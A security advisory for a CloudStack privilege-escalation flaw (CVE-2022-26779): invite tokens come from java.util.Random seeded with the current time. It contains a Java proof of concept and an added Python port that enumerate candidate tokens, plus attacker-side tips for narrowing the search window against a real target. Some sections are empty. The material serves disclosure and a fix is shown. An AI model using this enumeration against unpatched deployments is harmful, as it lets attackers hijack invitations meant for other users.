
apache/cloudstack: Privileged escalation due to Predictable Seed in Pseudo-Random Number Generator (PRNG) and Use of Insufficiently Random Values

Moderate
JLLeitschuh published GHSA-vpcc-9rh2-8jfp Mar 10, 2022

Package

apache/cloudstack (None)

Affected versions

<= 4.16.0.0

Patched versions

4.16.1.0

Description

Impact

Apache CloudStack contains a privilege escalation vulnerability in the project invitation logic: the invite token is produced by a PRNG seeded with a predictable value (the current time in milliseconds), so an attacker can enumerate the token and accept an invitation that was issued to someone else.

Details

When a user or account is invited to a project by e-mail address, ProjectManagerImpl.inviteAccountToProject or ProjectManagerImpl.inviteUserToProject is invoked and a random token is e-mailed to the invitee so that they can join the project.

However, this token is generated predictably: generateToken is called with a length of 10 and seeds java.util.Random with System.currentTimeMillis(). java.util.Random is a 48-bit linear congruential generator, so the whole token is a deterministic function of that millisecond timestamp.

As a result, an attacker who knows roughly when an invite to another user was generated can enumerate every candidate timestamp in that window, recompute the corresponding token, and use it to impersonate the invited user's acceptance of the invite. A window of one hour is only 3.6 million candidates, versus the 36^10 (about 3.6 x 10^15) tokens a uniformly random 10-character token would allow.

The invite is stored in the database, but other than "having the secret token" there are no further checks to ensure that the user presenting the token is the user the token was assigned to.

The site where the project invite is looked up from the database:

The user that is the current caller is pulled from the request here:

Then, that accepted invite is assigned to the calling user here:

As such, an attacker is able to use an invite to a project that they were never sent, because they can compute the value of the invite token.

Proof Of Concept

The following code will print out all of the possible secret tokens for the next hour:

import java.util.Random;
import java.util.stream.LongStream;

public class InviteTokenPoc {

    // Mirrors ProjectManagerImpl.generateToken, except that the seed is passed in
    // instead of being read from System.currentTimeMillis(), so that every
    // candidate timestamp can be tried.
    public static String generateToken(long time, int length) {
        String charset = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
        Random rand = new Random(time);
        StringBuffer sb = new StringBuffer();
        for (int i = 0; i < length; i++) {
            int pos = rand.nextInt(charset.length());
            sb.append(charset.charAt(pos));
        }
        return sb.toString();
    }

    // Prints every token the server can issue for an invite generated at any
    // millisecond in the next hour (3,600,001 candidates).
    public static void main(String[] args) {
        long startTime = System.currentTimeMillis();
        LongStream
            .rangeClosed(startTime, startTime + 3_600_000L)
            .parallel()
            .mapToObj(time -> generateToken(time, 10))
            .forEach(System.out::println);
    }
}
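The Java PoC above enumerates candidates from inside a JVM. The following is an added example, not CloudStack code and not part of the original advisory: it ports java.util.Random's 48-bit LCG to Python so that an attacker-side script can reproduce the exact tokens CloudStack <= 4.16.0.0 would issue for every millisecond in a guessed window, recovers a constructed "server" token from a +/- 30 second window, and shows a CSPRNG-backed generator as the generic fix for this class of bug. The timestamp, the recover_invite helper and the secure generator are assumptions for the demonstration; the advisory does not state how 4.16.1.0 generates tokens.

```python
"""
Added example (not CloudStack code): bit-exact port of java.util.Random so that
the predictable project-invite tokens can be enumerated from Python, plus a
CSPRNG-based generator that removes the predictability.
"""
import secrets

MULTIPLIER = 0x5DEECE66D
ADDEND = 0xB
MASK = (1 << 48) - 1

# Same alphabet as ProjectManagerImpl.generateToken in the advisory's PoC.
CHARSET = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"


class JavaRandom:
    """Port of java.util.Random: seed scramble, next(bits), nextInt(), nextInt(bound)."""

    def __init__(self, seed):
        # Random(long seed) -> initialScramble: (seed ^ 0x5DEECE66D) & (2^48 - 1)
        self.seed = (seed ^ MULTIPLIER) & MASK

    def _next(self, bits):
        self.seed = (self.seed * MULTIPLIER + ADDEND) & MASK
        return self.seed >> (48 - bits)

    def next_int(self, bound=None):
        if bound is None:
            # nextInt(): next(32) reinterpreted as a signed 32-bit int
            r = self._next(32)
            return r - (1 << 32) if r >= (1 << 31) else r
        if bound <= 0:
            raise ValueError("bound must be positive")
        r = self._next(31)
        m = bound - 1
        if bound & m == 0:  # power of two: take the high bits
            return (bound * r) >> 31
        # Rejection loop; Java's "u - r + m < 0" is a 32-bit overflow test.
        u = r
        while True:
            r = u % bound
            if u - r + m <= 0x7FFFFFFF:
                return r
            u = self._next(31)


def generate_token(time_ms, length=10):
    """Vulnerable generator: the PoC's algorithm, seeded with a millisecond timestamp."""
    rand = JavaRandom(time_ms)
    return "".join(CHARSET[rand.next_int(len(CHARSET))] for _ in range(length))


def candidate_tokens(window_start_ms, window_end_ms, length=10):
    """Map of every token the vulnerable generator yields for a seed in [start, end]."""
    return {generate_token(t, length): t for t in range(window_start_ms, window_end_ms + 1)}


def recover_invite(server_token, guessed_send_time_ms, slack_ms, length=10):
    """
    Attacker side (hypothetical helper): the invite was sent around
    guessed_send_time_ms, e.g. taken from the notification e-mail's Date header.
    Enumerate +/- slack_ms and return the seed that reproduces the token, or None.
    In the real attack each candidate would be submitted to the accept-invite API
    rather than compared locally.
    """
    candidates = candidate_tokens(guessed_send_time_ms - slack_ms,
                                  guessed_send_time_ms + slack_ms, length)
    return candidates.get(server_token)


def generate_token_secure(length=10):
    """Hardened generator: CSPRNG output, no time-derived seed to enumerate."""
    return "".join(secrets.choice(CHARSET) for _ in range(length))


if __name__ == "__main__":
    # Constructed scenario: the server issued the invite at this fake timestamp
    # (2022-03-10 00:00:00 UTC). The attacker only knows the minute it arrived.
    issued_at = 1_646_870_400_000
    token = generate_token(issued_at)
    seed = recover_invite(token, issued_at + 12_345, 30_000)  # 60,001 candidates
    print(f"server token {token}; recovered seed {seed}; match={seed == issued_at}")
    print(f"one-hour window: 3,600,000 candidates vs {len(CHARSET) ** 10} possible tokens")
    print("CSPRNG token:", generate_token_secure())
```

JavaRandom(42).next_int() returns -1170105035, matching the JVM, which is the check to run before trusting any port of the generator against a real target. The one-hour enumeration in the Java PoC is a few seconds of work; in this Python port it is tens of seconds, so narrow the window with whatever timing information the invitation e-mail leaks.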

Patches

Workarounds

When calling the addAccountToProject API, do not invite by e-mail address; invite only an existing account or user, which does not go through the token-based e-mail invitation path.

Mitigating Factors

The global setting project.invite.required is false by default, so the e-mail invitation flow that issues the token is only reachable on deployments where an administrator has explicitly enabled it.

References

For more information

Open an issue with the Apache Cloudstack team here: https://github.com/apache/cloudstack/issues

Severity

Moderate

CVSS overall score

6.7 / 10 (CVSS v3.1 base score computed from the vector below)

CVSS v3 base metrics

Attack vector: Network
Attack complexity: High
Privileges required: Low
User interaction: Required
Scope: Unchanged
Confidentiality: High
Integrity: High
Availability: Low

CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:L

CVE ID

CVE-2022-26779

Credits